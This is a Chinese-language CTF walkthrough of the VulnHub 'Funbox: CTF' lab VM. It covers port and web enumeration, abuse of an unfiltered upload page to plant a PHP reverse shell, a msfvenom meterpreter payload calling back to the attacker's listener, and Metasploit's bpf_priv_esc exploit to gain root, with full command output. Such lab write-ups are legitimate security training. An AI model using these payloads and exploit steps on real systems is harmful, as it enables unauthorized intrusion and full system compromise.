Funbox 4靶机信息
名称:Funbox: CTF
URL:
https://www.vulnhub.com/entry/funbox-ctf,546/识别靶机IP地址
将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。
内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。
(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: Finished! | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:4e:f4:34 1 60 PCS Systemtechnik GmbH 192.168.56.150 08:00:27:4e:a2:f4 1 60 PCS Systemtechnik GmbH NMAP 扫描
利用NMAP工具进行全端口扫描:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-05-06 02:45 EDTNmap scan report for bogon (192.168.56.150)Host is up (0.00024s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)| 256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)|_ 256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It works|_http-server-header: Apache/2.4.18 (Ubuntu)110/tcp open pop3 Dovecot pop3d|_pop3-capabilities: PIPELINING AUTH-RESP-CODE UIDL TOP SASL CAPA RESP-CODES143/tcp open imap Dovecot imapd|_imap-capabilities: have SASL-IR capabilities LOGIN-REFERRALS IDLE ENABLE post-login OK LITERAL+ Pre-login listed ID more LOGINDISABLEDA0001 IMAP4rev1MAC Address: 08:00:27:4E:A2:F4 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 9.70 secondsNMAP扫描结果表明目标主机有4个开放端口:
22(ssh),80(http),110(pop3),143(imap)
获得Shell
└─$ nikto -h http://192.168.56.150- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.150+ Target Hostname: 192.168.56.150+ Target Port: 80+ Start Time: 2023-05-06 02:46:11 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.18 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found.+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host+ End Time: 2023-05-06 02:47:07 (GMT-4) (56 seconds)---------------------------------------------------------------------------其实作者给出了一个提示,即本靶机nikto时区分大小写。虽然/robots.txt文件不存在,看可测试大写字母的ROBOTS.TXT是否存在。
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ curl http://192.168.56.150/ROBOTS.TXT Disallow: upload/Disallow: igmseklhgmrjmtherij2145236┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ curl http://192.168.56.150/igmseklhgmrjmtherij2145236/403 Forbidden Forbidden
You don't have permission to access /igmseklhgmrjmtherij2145236/on this server.
Apache/2.4.18 (Ubuntu) Server at 192.168.56.150 Port 80但是访问 igmseklhgmrjmtherij2145236 返回 forbidden的信息,因此可能该目录下存在子目录或者文件,继续用gobuster工具扫描.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ gobuster dir -u http://192.168.56.150/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.js,.txt,.sh===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.56.150/igmseklhgmrjmtherij2145236/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.5[+] Extensions: php,html,bak,js,txt,sh[+] Timeout: 10s===============================================================2023/05/06 03:04:36 Starting gobuster in directory enumeration mode===============================================================/.html (Status: 403) [Size: 321]/.php (Status: 403) [Size: 320]/upload.html (Status: 200) [Size: 297]/upload (Status: 301) [Size: 344] [--> http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/]/upload.php (Status: 200) [Size: 319]Progress: 11663 / 1543927 (0.76%)^C[!] Keyboard interrupt detected, terminating.上述目录下发现了/upload子目录以及upload.php 文件,后者允许我们上传文件,而且没有任何过滤机制,因此接下来就是上次shell.php文件,但是该文件放在什么位置呢,注意到有/upload子目录,可能在该子目录下,经访问验证了这一点:
http://192.168.56.150/igmseklhgmrjmtherij2145236/upload/shell.php在Kali Linux上成功得到了目标主机反弹回来的shell.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ sudo nc -nlvp 5555 [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.230] from (UNKNOWN) [192.168.56.150] 48272Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 09:08:17 up 26 min, 0 users, load average: 1.13, 1.81, 2.70USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ which python/usr/bin/python$ python -c 'import pty;pty.spawn("/bin/bash")'www-data@funbox4:/$ cd /homecd /homewww-data@funbox4:/home$ ls -alhls -alhtotal 16Kdrwxr-xr-x 4 root root 4.0K Aug 29 2020 .drwxr-xr-x 23 root root 4.0K May 6 09:07 ..drwx------ 4 anna anna 4.0K Aug 30 2020 annadrwxr-xr-x 4 thomas thomas 4.0K Aug 30 2020 thomaswww-data@funbox4:/home$ cd annacd annabash: cd: anna: Permission deniedwww-data@funbox4:/home$ cd thomascd thomaswww-data@funbox4:/home/thomas$ ls -alhls -alhtotal 3.0Mdrwxr-xr-x 4 thomas thomas 4.0K Aug 30 2020 .drwxr-xr-x 4 root root 4.0K Aug 29 2020 ..-rw------- 1 thomas thomas 46 Aug 30 2020 .bash_history-rw-r--r-- 1 thomas thomas 220 Aug 29 2020 .bash_logout-rw-r--r-- 1 thomas thomas 3.7K Aug 29 2020 .bashrcdrwx------ 2 thomas thomas 4.0K Aug 29 2020 .cache-rw-r--r-- 1 thomas thomas 675 Aug 29 2020 .profiledrwx------ 2 thomas thomas 4.0K Aug 30 2020 .ssh-rw-r--r-- 1 thomas thomas 195 Aug 29 2020 .todo-rw------- 1 thomas thomas 1.3K Aug 30 2020 .viminfo-rw-rw-r-- 1 thomas thomas 217 Aug 30 2020 .wget-hsts-rwx------ 1 thomas thomas 3.0M Aug 22 2019 pspy64Privilege Escalation
www-data@funbox4:/$ cat hint.txtcat hint.txtThe OS beard ist whiter and longer as Gandalfs one !Perhaps, its possible to get root from here. I doesnt look forward to see this in the writeups/walktroughs, but this is murpys law !Now, rockyou.txt isnt your friend. Its a little sed harder :-)If you need more brainfuck: Take this:++++++++++[>+>+++>+++++++>++++++++++<<<>>++++++++++++++.>++++.---.<>+++++++++.---------.+++++++++++++++++++.----.<>------------.+.+++++.++++++.<>-----------.++++++++++.<>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<>+++++.+++++.<<++++++++++++++++++++++++++.Bit more ?Tm8gaGludHMgaGVyZSAhCg==Not enough ?KNSWC4TDNAQGM33SEB2G6ZDPOMXA====++++++++++[>+>+++>+++++++>++++++++++<<<>>++++++++++++++.>++++.---.<>+++++++++.---------.+++++++++++++++++++.----.<>------------.+.+++++.++++++.<>-----------.++++++++++.<>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<>+++++.+++++.<<++++++++++++++++++++++++++.利用下面的网站解码上述信息(brainfuck):
https://www.splitbrain.org/services/ook解码得到
The next hint is located in:┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ echo 'Tm8gaGludHMgaGVyZSAhCg==' | base64 -dNo hints here !┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base32 -dSearch for todos. 但是其实这些虽然成功解码,没什么价值,是作者故意留的一些陷阱。下一步将已经得到的shell升级到meterpreter,不过本靶机特殊的是,靶机上没有wget, curl等工具,可以用upload.php页面来上传文件:
─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf将escalate.elf载荷上传到目标主机/tmp目录下,并修改权限 .
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236$ cd uploadcd uploadwww-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -alhls -alhtotal 20Kdrwxrwxrwx 2 root root 4.0K May 6 09:25 .drwxr-xr-x 3 root root 4.0K Aug 29 2020 ..-rw-r--r-- 1 www-data www-data 207 May 6 09:25 escalate.elf-rw-r--r-- 1 www-data www-data 5.4K May 6 09:07 shell.phpwww-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ mv escalate.elf /tmp<tml/igmseklhgmrjmtherij2145236/upload$ mv escalate.elf /tmp www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /tmpcd /tmpwww-data@funbox4:/tmp$ chmod +x escalate.elfchmod +x escalate.elfwww-data@funbox4:/tmp$ 同时在Kali Linux启动handler, 等待目标主机的连接。
msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf6 exploit(multi/handler) > set LhOST 192.168.56.230LhOST => 192.168.56.230msf6 exploit(multi/handler) > set LPORT 6666LPORT => 6666msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.230:6666 在目标主机shell中执行载荷,然后利用suggester模块定位合适的提权模块
msf6 exploit(multi/handler) > search suggesterMatching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit SuggesterInteract with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggestermsf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploitsmsf6 post(multi/recon/local_exploit_suggester) > set SESSION 1SESSION => 1msf6 post(multi/recon/local_exploit_suggester) > run[*] 192.168.56.150 - Collecting local exploits for x86/linux...[*] 192.168.56.150 - 167 exploit checks are being tried...[+] 192.168.56.150 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.[+] 192.168.56.150 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.[+] 192.168.56.150 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.[+] 192.168.56.150 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.[+] 192.168.56.150 - exploit/linux/local/pkexec: The service is running, but could not be validated.[+] 192.168.56.150 - exploit/linux/local/su_login: The target appears to be vulnerable.[*] Running check method for exploit 48 / 48[*] 192.168.56.150 - Valid modules for session 1:============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/bpf_priv_esc Yes The target appears to be vulnerable. 2 exploit/linux/local/bpf_sign_extension_priv_esc Yes The target appears to be vulnerable. 3 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable. 4 exploit/linux/local/glibc_realpath_priv_esc Yes The target appears to be vulnerable. 5 exploit/linux/local/pkexec Yes The service is running, but could not be validated. 6 exploit/linux/local/su_login Yes The target appears to be vulnerable.msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/bpf_priv_esc[*] Using configured payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/local/bpf_priv_esc) > show options Module options (exploit/linux/local/bpf_priv_esc): Name Current Setting Required Description ---- --------------- -------- ----------- COMPILE Auto yes Compile on target (Accepted: Auto, True, False) MAXWAIT 120 yes Max time to wait for decrementation in seconds SESSION yes The session to run this module onPayload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 1 Linux x64msf6 exploit(linux/local/bpf_priv_esc) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(linux/local/bpf_priv_esc) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/bpf_priv_esc) > set SESSION 1SESSION => 1msf6 exploit(linux/local/bpf_priv_esc) > run[*] Started reverse TCP handler on 192.168.56.230:8888 [*] Running automatic check ("set AutoCheck false" to disable)[+] The target appears to be vulnerable.[-] libfuse-dev is not installed. Compiling will fail.[*] Writing '/tmp/hello' (9576 bytes) ...[*] Writing '/tmp/doubleput' (13920 bytes) ...[*] Writing '/tmp/suidhelper' (25792 bytes) ...[*] Writing '/tmp/.dSu6XHZTXdNaEU' (282 bytes) ...[*] Launching exploit. This may take up to 120 seconds.[!] This module adds a job to /etc/crontab which requires manual removal![+] Success! set-uid root /tmp/suidhelper[*] Sending stage (3020772 bytes) to 192.168.56.150[+] Deleted /tmp/hello[+] Deleted /tmp/doubleput[+] Deleted /tmp/.dSu6XHZTXdNaEU[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.150:53458) at 2023-05-06 03:36:04 -0400meterpreter > shellProcess 10780 created.Channel 1 created.iduid=0(root) gid=0(root) groups=0(root),33(www-data)cd /rootls -alhtotal 36Kdrwx------ 3 root root 4.0K Aug 30 2020 .drwxr-xr-x 23 root root 4.0K May 6 09:07 ..-rw------- 1 root root 1.9K Aug 30 2020 .bash_history-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrcdrwx------ 2 root root 4.0K Aug 30 2020 .cache-rw-r--r-- 1 root root 148 Aug 17 2015 .profile-rw------- 1 root root 6.4K Aug 30 2020 .viminfo-rw-r--r-- 1 root root 430 Aug 29 2020 flag.txtcat flag.txt( _`\ ( ) ( _`\(_ _)( _`\ | (_(_)_ _ ___ | |_ _ _ | ( (_) | | | (_(_)| _) ( ) ( )/' _ `\| '_`\ /'_`\ (`\/')(_) | | _ | | | _) | | | (_) || ( ) || |_) )( (_) ) > < _ | (_( ) | | | | (_) `\___/'(_) (_)(_,__/'`\___/'(_/\_)(_) (____/' (_) (_) Well done ! Made with ❤ by @0815R2d2 ! I look forward to see this screenshot on twitter ;-)STRIVE FOR PROGRESS,NOT FOR PERFECTION